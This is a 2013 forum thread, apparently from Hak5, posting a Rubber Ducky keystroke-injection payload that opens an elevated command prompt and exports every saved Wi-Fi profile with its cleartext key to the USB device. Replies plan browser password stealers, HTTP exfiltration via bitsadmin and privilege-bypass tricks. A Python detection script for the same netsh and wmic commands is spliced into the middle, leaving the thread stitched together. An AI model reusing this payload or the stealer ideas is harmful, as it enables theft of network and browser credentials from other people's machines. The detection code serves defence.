crashie Posted March 10, 2013 (edited)

This stealer script exports all the Wi-Fi passwords to the SD mounted in the Rubber Ducky.

Requirement: this one is to be used with Twin Duck firmware.

    DELAY 1000
    REM Open the Start menu and launch cmd elevated (CTRL+SHIFT+ENTER triggers the UAC prompt)
    ESCAPE
    CONTROL ESCAPE
    DELAY 400
    STRING cmd
    DELAY 400
    CTRL-SHIFT ENTER
    DELAY 400
    REM Find the drive letter of the volume labelled DUCKY (the Twin Duck mass-storage partition)
    STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d
    DELAY 500
    ENTER
    DELAY 300
    REM Export every saved WLAN profile, with the key in clear text, to the root of that drive
    STRING netsh wlan export profile folder=%myd%\ key=clear
    ENTER
    DELAY 500
    STRING exit
    ENTER

Edited March 10, 2013 by crashie
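From the defender's side, the two commands this payload types (a volume lookup by label, then netsh wlan export profile with key=clear) are easy to spot in process-creation telemetry. The following Python is an added example, not code from the thread: it scores a few constructed Sysmon-style process-creation records and escalates an export that follows a volume-label lookup within a short window. The event tuples, timestamps and severity labels are all assumptions made for the example.

```python
import re
from datetime import datetime

# Constructed sample process-creation events (Sysmon Event ID 1 style, reduced to
# timestamp, image and command line). Sample data only, not taken from a real host.
SAMPLE_EVENTS = [
    ("2013-03-10T10:00:01", r"C:\Windows\System32\cmd.exe", "cmd"),
    ("2013-03-10T10:00:02", r"C:\Windows\System32\wbem\WMIC.exe", "wmic volume get driveletter, label"),
    ("2013-03-10T10:00:03", r"C:\Windows\System32\netsh.exe", r"netsh wlan export profile folder=E:\ key=clear"),
    ("2013-03-10T10:20:00", r"C:\Windows\System32\netsh.exe", "netsh wlan show interfaces"),
    ("2013-03-10T11:00:00", r"C:\Windows\System32\netsh.exe", r"netsh wlan export profile folder=C:\backup"),
]

EXPORT_RE = re.compile(r"\bnetsh(\.exe)?\s+wlan\s+export\s+profile\b", re.I)
KEY_CLEAR_RE = re.compile(r"\bkey\s*=\s*clear\b", re.I)  # writes the PSK in plaintext into the XML
VOLUME_LABEL_RE = re.compile(r"\bwmic(\.exe)?\s+volume\s+get\b.*\blabel\b", re.I)

def classify(cmdline):
    """Return (severity, reason) for one command line, or None if it is not of interest."""
    if EXPORT_RE.search(cmdline):
        if KEY_CLEAR_RE.search(cmdline):
            return ("high", "wlan profile export with plaintext key")
        return ("medium", "wlan profile export")
    if VOLUME_LABEL_RE.search(cmdline):
        return ("low", "volume lookup by label (removable-media staging)")
    return None

def triage(events, window_seconds=60):
    """Classify each event; raise an export to 'critical' when a volume-label lookup
    preceded it within window_seconds, which is the staging-then-export sequence above."""
    findings = []
    last_lookup = None
    for ts, _image, cmdline in events:
        hit = classify(cmdline)
        if hit is None:
            continue
        severity, reason = hit
        when = datetime.fromisoformat(ts)
        if severity == "low":
            last_lookup = when
        elif last_lookup is not None and (when - last_lookup).total_seconds() <= window_seconds:
            severity, reason = "critical", reason + ", preceded by volume lookup"
        findings.append({"timestamp": ts, "severity": severity, "reason": reason, "cmdline": cmdline})
    return findings

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["timestamp"], f["severity"].upper(), f["reason"], "::", f["cmdline"])
```

A plain netsh wlan export profile without key=clear is kept at medium because the exported XML then carries no usable key material, while the same command after a volume lookup is the pattern the thread describes.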
C3PBRO Posted March 11, 2013 (edited)

Great work with these new payloads man! Keep it up!

Edited March 11, 2013 by C3PBRO
crashie Posted March 11, 2013 (Author)

> Great work with these new payloads man! Keep it up!

Thanks! I've been playing around all weekend and am getting the hang of things now :P I am currently working on a browser stealer which is a command-line only one. A small executable that does not need any admin rights of course; it will be executed from the SD and export a .txt to the SD. There are many browser stealers out there, but some get flagged by the AVs, like NirSoft's, and others are too heavy in size because of a GUI.. And btw, take a look at the bitsadmin payload.. sending files over HTTP :P Will continue to put up all my work here; was first thinking of putting them on my website but hey.. it's all for the community :P

/crashie
shutin Posted March 14, 2013

Really excited to see this. Does it require admin rights?
crashie Posted March 14, 2013 (Author)

> Really excited to see this. Does it require admin rights?

Yeah, sadly enough it does.. the CMD has to run as admin, so the local user has to be in that group, yes. But I am working on a solution to bypass that.. so you can run it on a regular user account with elevated privileges. To steal the browser passwords (Opera, Safari, Firefox, Chrome) though it's not needed :P I will add that payload later this week when it's finished and tested completely. One version that saves it to the SD and one that sends it out over HTTP. Bitsadmin works great for sending stuff over the Internet as HTTP, but it requires an IIS server on the other end. I am though working on an exploit to also be able to steal the Wi-Fi passwords in clear text without being admin, as I said.. but it will take some time to finish since I'm working on it alone. But I'll keep posting the results here :)

/crashie
shutin Posted March 16, 2013

> Yeah, sadly enough it does.. the CMD has to run as admin, so the local user has to be in that group, yes. But I am working on a solution to bypass that.. so you can run it on a regular user account with elevated privileges.
> /crashie

Well.. I wrote a script using these basic techniques and it exported just fine since my user was an admin. I think the vast majority of people on Windows are single users running with admin, so it's actually pretty rare to find someone smart enough to add a local regular user. My problem was I couldn't get wmic to find the DUCKY label and output to my SD card. I will try this script and see if it does the magic.
crashie Posted March 16, 2013 (Author)

> Well.. I wrote a script using these basic techniques and it exported just fine since my user was an admin. I think the vast majority of people on Windows are single users running with admin, so it's actually pretty rare to find someone smart enough to add a local regular user. My problem was I couldn't get wmic to find the DUCKY label and output to my SD card. I will try this script and see if it does the magic.

Yeah, you're right :P Most of the users run as local admin. The wmic should work great.. works fine here at least :) Also keep in mind your keyboard layout so it has the right symbols.. this one won't work with Danish, Norwegian or Swedish layouts because of a missing ^ in the properties file..
Hackman1970 Posted September 18, 2013 (edited)

About this key ^ for Norwegian, Swedish and Danish, you may want to look at this post; see my comment at the bottom of the page: https://forums.hak5.org/index.php?/topic/30210-payload-memory-dump-windows-recover-password-without-setting-off-av/

Edited September 18, 2013 by Hackman1970
waddell Posted September 19, 2013

I'm not able to get this command to export my profile. I've tried this on two different computers but I get a response like "The filename, directory name, or volume label syntax is incorrect." for a command like "netsh wlan export profile key=clear". Anyone else having issues with this? I am logged in as an admin, and I've also tried to run cmd as administrator.
b00stfr3ak Posted September 22, 2013

Added this to the toolkit I have made and made some modifications using PowerShell. https://forums.hak5.org/index.php?/topic/30333-power-ducky-toolkit/
triphazard Posted October 15, 2013

I was reading through Tim Tomes' website when I found this link and thought of this thread. Why fight with admin rights when you don't need to, right? Let Windows do the work. http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html I plan on checking this out sometime when I get home tomorrow. But if the article is correct (Tim Tomes linked to it, and he's freakin' awesome) those keys aren't protected; they're just obscured a bit in a proprietary way (best security ever), so that settings can still be imported and exported. The reason why it would be this way baffles me, which is why I still intend to check it out for myself. The article was written for Vista, when they changed the way Windows handles wireless PSKs, which I don't believe has changed again yet. Please correct me if I'm wrong.
b00stfr3ak Posted October 17, 2013

> I was reading through Tim Tomes' website when I found this link and thought of this thread. Why fight with admin rights when you don't need to, right? Let Windows do the work. http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html I plan on checking this out sometime when I get home tomorrow. But if the article is correct (Tim Tomes linked to it, and he's freakin' awesome) those keys aren't protected; they're just obscured a bit in a proprietary way (best security ever), so that settings can still be imported and exported. The reason why it would be this way baffles me, which is why I still intend to check it out for myself. The article was written for Vista, when they changed the way Windows handles wireless PSKs, which I don't believe has changed again yet. Please correct me if I'm wrong.

Hey, I have added your idea to my power-ducky toolkit. It should work, but I don't have a Windows laptop with wireless to test. https://forums.hak5.org/index.php?/topic/30333-power-ducky-toolkit/
UnKn0wnBooof Posted October 25, 2013

You can't recover Wi-Fi keys without admin access. I've already attempted it, as well as taking a look at some of Microsoft's tutorials on how the encryption algorithm works. It's impossible to recover the keys without the correct permissions. The payload "ULTIMATE DATA THEIF!" does way more than just stealing Wi-Fi passwords.